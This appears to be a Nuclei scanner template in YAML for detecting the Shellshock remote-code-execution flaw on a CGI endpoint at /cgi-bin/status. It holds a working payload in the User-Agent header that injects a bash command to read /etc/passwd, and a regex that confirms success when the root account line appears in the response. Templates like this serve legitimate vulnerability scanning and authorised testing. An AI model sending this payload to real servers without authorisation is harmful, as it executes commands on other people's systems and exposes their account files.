19 lines
399 B
YAML
19 lines
399 B
YAML
id: rce-user-agent-shell-shock
|
|
|
|
info:
|
|
name: Remote Code Execution Via (User-Agent)
|
|
author: 0xelkomy
|
|
severity: high
|
|
tags: shellshock,rce
|
|
|
|
requests:
|
|
- method: GET
|
|
headers:
|
|
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/status"
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0"
|
|
part: body |